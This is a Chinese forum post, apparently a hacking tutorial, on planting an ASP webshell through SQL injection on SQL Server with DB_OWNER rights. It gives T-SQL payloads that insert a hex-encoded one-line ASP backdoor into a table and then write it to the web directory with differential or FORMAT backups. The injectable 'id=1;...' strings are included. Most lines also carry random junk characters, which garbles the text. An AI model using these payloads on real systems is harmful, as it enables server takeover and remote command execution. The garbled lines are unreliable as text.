DB_OWNER权限得到webshell的两点改进:
! M X1 y" j1 p7 O9 c. N' b! ?) ^& W+ [
减少备份文件大小,得到可执行的webshell成功率提高不少
0 R6 D1 Q; ?8 | u8 y4 s一利用差异备份- b; x! S: g8 k- S7 c
加一个参数WITH DIFFERENTIAL, j3 O6 L( n/ e+ Z- n8 C, I: \
+ }7 i; V& V; p6 W$ s1
! ^2 r9 u' |9 X& v& b, D2. v& V3 r* v! v! G. N- M; _/ t
38 |+ J7 L r G/ A
4 _6 h1 b( M% l8 H
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
. Z; ]/ E% b8 w( p2 j/ ?create table [dbo].[xiaolu] ([cmd] [image]);
4 p9 E% q9 N4 t* ?insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
8 s+ B, i N( udeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL " R% C' E8 ~ G: s
! X( }8 V4 C. s& w3 @ e; M二利用完全FORMAT8 T& p. _( |% y
加一个参数WITH FROMAT( r- `5 |- L# L1 |
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以6 u7 m; u# ~- i( F
; \" B& v6 r& v1 y; l6 a$ }2 h4 l
15 t9 s. ?, o; W; _% E, j7 d6 @. Z
2
: m. R+ }- @$ f$ x- L: `3 A7 X3
2 E9 S, F1 J1 o* b# r4
- V. d5 J! G( F; y. K( b declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
7 Z' m+ I. c+ f: m& q! H* m- y/ ?create table [dbo].[xiaolu] ([cmd] [image]);4 B( l9 A$ @# `9 }6 w# I
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
/ q: T' c! ?0 w# |% t/ W. Wdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
1 J0 m. E/ m7 k+ _8 d `0 [0 i. t5 V
总的来说就是那么简单几句,下面以备份数据库model为例子4 o- M; Q$ Z" _) q6 ~2 X! h& P
1
5 i1 s5 v F6 p8 e( m8 j: @) c% Q+ q& `. [3 S7 O
1! m& |) n, f; E/ l2 P! T' @% {
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
- e; o( l( s q4 t3 @& I" B5 ~7 b) Z/ g0 s& {
2
: M& \, M8 G8 Q2 ^7 ]9 M+ F% n
+ z; b, ?! r+ i4 U* \1
6 t7 L# f) T6 m) S t" n id=1;backup database model to disk='你的路径‘ with differential,format;-- / K2 s- T1 ~1 C( ~
|